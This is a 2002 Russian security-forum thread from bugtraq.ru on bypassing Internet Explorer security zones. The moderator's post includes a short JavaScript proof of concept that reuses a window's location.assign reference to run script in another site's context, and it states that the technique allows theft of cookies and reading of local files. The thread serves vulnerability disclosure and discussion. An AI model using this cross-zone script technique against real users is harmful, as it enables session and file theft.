информационная безопасность без паники и всерьез  подробно о проекте
			Анализ криптографических сетевых...   Модель надежности двухузлового...   Специальные марковские модели надежности...   Microsoft обещает радикально усилить...   Ядро Linux избавляется от российских...   20 лет Ubuntu
	главная обзор RSN блог библиотека закон бред форум dnet о проекте
	bugtraq.ru / форум / site updates		Имя Пароль

ФОРУМ если вы видите этот текст, отключите в настройках форума использование JavaScript регистрация Легенда:   новое сообщение   закрытая нитка   новое сообщение   в закрытой нитке   старое сообщение	Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания. Новичкам также крайне полезно ознакомиться с данным документом. Обход зон безопасности в IE 07.10.02 22:57  Число просмотров: 1462 Автор: Digital_Scream Статус: Незарегистрированный пользователь <"чистая" ссылка> Как на меня ничего особенного. Обход зон безопасности в IE сталь обычным делом. Есть способы на любой вкус, а это еще один :) <site updates> Обход зон безопасности в IE 03.10.02 02:32   Publisher: dl <Dmitry Leonov> Отредактировано 03.10.02 02:55  Количество правок: 1 <"чистая" ссылка> Обход зон безопасности в IE пример 1,пример 2 http://www16.brinkster.com/liudieyu/SaveRef/SaveRef-MyPage.htm, http://jscript.dk/2002/10/sec/SaveRefLocalFile.html Сохранение ссылки на NewWindow.location.assign, где NewWindow - окно, созданное скриптом, позволяет выполнить произвольный скрипт в любой зоне безопасности: function f(){} w=window.open("nothing.htm","_blank","height=150 width=150 left=0 top=0"); f=w.location.assign; w.location.href="http://www.yahoo.com"; alert("wait for the page"); f("javascript:alert(document.body.innerHTML)"); Первой строчкой открываем окно с локальным файлом (возможно, и несуществующим), сохраняем ссылку н аэто окно, далее, открыв в нем страницу из другой зоны, вызываем код в ее контексте. Помимо кражи кук пользователя с произвольных сайтов, это дает возможность получить доступ к локальным файлам - см. пример 2. Полный текст Обход зон безопасности в IE 05.10.02 02:26   Автор: RedAndr UfaTeam <Андрей Рыжков> Статус: Member <"чистая" ссылка> Помимо кражи кук пользователя с произвольных сайтов, это > дает возможность получить доступ к локальным файлам - см. > пример 2. У меня AVP второй пример зарубил :) Обход зон безопасности в IE 07.10.02 22:57   Автор: Digital_Scream Статус: Незарегистрированный пользователь <"чистая" ссылка> Как на меня ничего особенного. Обход зон безопасности в IE сталь обычным делом. Есть способы на любой вкус, а это еще один :) 1

Copyright © 2001-2024 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach